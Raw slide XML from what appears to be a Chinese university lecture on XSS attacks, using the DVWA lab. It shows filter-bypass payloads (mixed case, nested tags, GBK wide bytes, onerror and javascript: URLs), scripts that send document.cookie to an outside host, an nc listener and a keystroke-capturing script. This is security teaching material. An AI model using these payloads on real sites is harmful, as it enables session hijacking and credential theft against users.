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412" r:id="rId3"/>
    <p:sldId id="413" r:id="rId4"/>
    <p:sldId id="414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8" r:id="rId16"/>
    <p:sldId id="427" r:id="rId17"/>
    <p:sldId id="429" r:id="rId18"/>
    <p:sldId id="426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0" autoAdjust="0"/>
    <p:restoredTop sz="79526" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="110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42DDFC-F4E8-478C-A35D-8BC08AA8EF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D65A7-335D-4B2A-9D50-B3107282E6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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高级可绕过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15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 &lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="http://10.166.33.85:808/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>abc.php?output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 808</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pP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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="http://10.166.33.189/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cookie.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;/script&gt;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6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="http://10.166.33.189/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>auth.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=yvceb3&amp;info=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>input+your+account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;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146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&lt;script&gt;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keyDown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(){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realkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>event.keyCode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alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>realkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>);}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>document.onkeydown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>keyDown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&lt;/script&gt;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50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2540000" y="4681538"/>
            <a:ext cx="2627313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0" y="3205163"/>
            <a:ext cx="3987800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artplus_nature_naturalcity38_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5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4114800"/>
            <a:ext cx="1219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0" y="0"/>
            <a:ext cx="12192000" cy="3200400"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="2016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 6" descr="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0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0"/>
              <a:ext cx="858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14" descr="water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914400"/>
            <a:ext cx="1155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581400"/>
            <a:ext cx="9347200" cy="381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22400" y="2514600"/>
            <a:ext cx="9347200" cy="685800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900">
                <a:latin typeface="Arial" charset="0"/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600" y="6477000"/>
            <a:ext cx="3860800" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="17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8432800" y="6477000"/>
            <a:ext cx="2844800" cy="244475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8EA427-15B8-46D4-B682-EC205FF1F990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1379200" y="6477000"/>
            <a:ext cx="609600" cy="244475"/>
          </a:xfrm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EA3C51-313A-4BC9-BCFA-FFCF26863A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6520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54D6A-A38E-45B4-A7EF-BC98933C2E56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B1581-E50D-4F7C-B564-D9C17FDE6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02611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88400" y="350838"/>
            <a:ext cx="27940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350838"/>
            <a:ext cx="8178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DAFAE-3E1E-4C69-BE05-094411F9A3F3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6C42-9D97-4223-A2C4-F32D2E2AB0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217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17600" y="350838"/>
            <a:ext cx="96520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6400" y="12192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096000" y="12192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06400" y="38481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96000" y="38481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499F1-13F3-42FD-9ED9-8D6F6A494EAC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CB51-E9DF-45BC-9F6B-47237731C6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2686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A876-C78E-4D32-8D4B-949BAECB8BCA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94EA1-B0FE-47BB-89D5-DBFDAF7DD8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0523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85405-CACE-49D6-818D-F9ECBB31D390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24533-BE1C-4745-99D0-F21F23BB72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810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0" y="12192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8279C-911A-4E84-851D-45DE48F574EF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AF809-11BA-4A24-812C-DC8FA9DD4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5886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1DCE4-D97B-4B92-A4D4-650FB45CE2C9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1FC8-2CD3-4F37-9DE5-52BE184710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6165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2D857-1B9F-4B4E-8AF5-ECE75FFAC4E1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4AE96-FA8A-4F34-AAD9-ACA01D1A17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1299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AFEC6-01AE-46EB-920E-51173516AEB9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88691-A855-4C84-9090-3F29DB6DE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103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CF695-0C4F-49F8-B5F6-1BF9B94FC772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3F489-C9B5-4A40-A9AB-3819D01567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7073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8C8A8-A8F4-4CAE-A5D2-47DD693DC1BB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E8B71-1848-46F0-B257-F15007448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8294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12192000" cy="1943100"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="1224"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1036" name="Picture 3" descr="4_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4" descr="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" y="0"/>
              <a:ext cx="666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5" descr="12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090">
              <a:off x="48" y="96"/>
              <a:ext cx="543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0" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="6553200"/>
            <a:ext cx="12192000" cy="304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028" name="Picture 7" descr="artplus_nature_naturalcity38_g"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17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80"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10058400" y="5322888"/>
            <a:ext cx="21336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486400" y="6537325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384F07C-BDBB-4B28-8FBE-B103918D09E4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914400" y="1219200"/>
            <a:ext cx="10287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06400" y="6537325"/>
            <a:ext cx="71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5902DCE-0D56-434D-83C1-3CA476AA05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white">
          <a:xfrm>
            <a:off x="12700" y="5967413"/>
            <a:ext cx="855663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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1117600" y="350838"/>
            <a:ext cx="9652000" cy="563562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219200" y="6537325"/>
            <a:ext cx="386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5" name="Picture 15" descr="njupt_new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070600"/>
            <a:ext cx="1854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438069-F8B8-4DBC-B0D6-C859A1C30599}" type="datetime1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34B4F-93F7-4C38-88ED-A605C4E42F40}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b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2438400"/>
            <a:ext cx="7467600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>第三讲 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>攻击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581400"/>
            <a:ext cx="7086600" cy="1295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陈伟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chenwei@njupt.edu.cn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Tel: 18951896489</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN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大小写混合测试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开发者会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等关键词作为黑名单过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>但由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站的类型变化多样，黑名单很难考虑周全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可采用大小写混合的方式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sCriPt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;alert(/XSS/)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>scRipT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防范时，可以强制大小写转换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转换小写形式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strtoupper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>转换大写形式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BD1190-67DC-448E-AFCD-20A781A7DA8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="4114800"/>
            <a:ext cx="3886200" cy="1219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b="1" dirty="0"/>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>页面中插入一段 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：也可以通过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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性指向外部脚本文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/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1548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多重嵌套测试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通过正则表达式，忽略大小写，可以过滤所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可尝试构建以下测试代码：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scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;alert(/XSS/)&lt;/script&gt;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scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" strike="sngStrike" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;alert(/XSS/)&lt;/script&gt;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7088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宽字节绕过测试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高级别的防范手段，会对用户输入进行严格检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码存在宽字节的问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一字节（高字节）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: 0x81-0xFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二字节（低字节）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: 0x40-0x7E, 0x80-0xFE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的编码是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x5C,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正好在低字节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;&lt;script&gt;alert(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/)&lt;/script&gt;;//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>  -&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>縗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UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的普及，宽字节漏洞越来越少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03EB92-2F8E-4B1E-B4CB-B74CA33F3EAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="76200"/>
            <a:ext cx="48768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用户提交的内容服务器转义后，用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GBK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格式显示（浏览器解析）时恰好触发，这和管理员预期的不一样</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39182380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多标签测试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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的过程中，能触发弹窗效果的，远不止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这一种标签</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站代码不尽相同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同的场景</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不同环境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>许多已公开的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>已无法使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>现在浏览器中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS Filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以针对钓鱼攻击的脚本进行过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防范反射型跨站效果明显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715000" y="20574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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)”&gt;&lt;/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DYNSRC=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)/”&gt;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=“” style=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>test:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’)):”&gt;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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')&gt;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83012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攻击的利用方式窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（实验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1026" name="Picture 2" descr="https://img-blog.csdnimg.cn/20200918213336267.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0NLVF9HT0Q=,size_16,color_FFFFFF,t_70#pic_cen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32618"/>
            <a:ext cx="9652000" cy="595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160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利用步骤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注入脚本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pPr marL="400050" lvl="1" indent="0">
              <a:buNone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document.location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=‘http://www.xxx.com/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cookie.php?cookie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=‘+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document.cookie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</a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>前面我们只是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其实现一个简单的弹窗并没有进一步加以利用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www.xxx.com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上准备好一个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cookie.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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B42BA7-2F34-4B6D-9016-5DE7FF605D9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
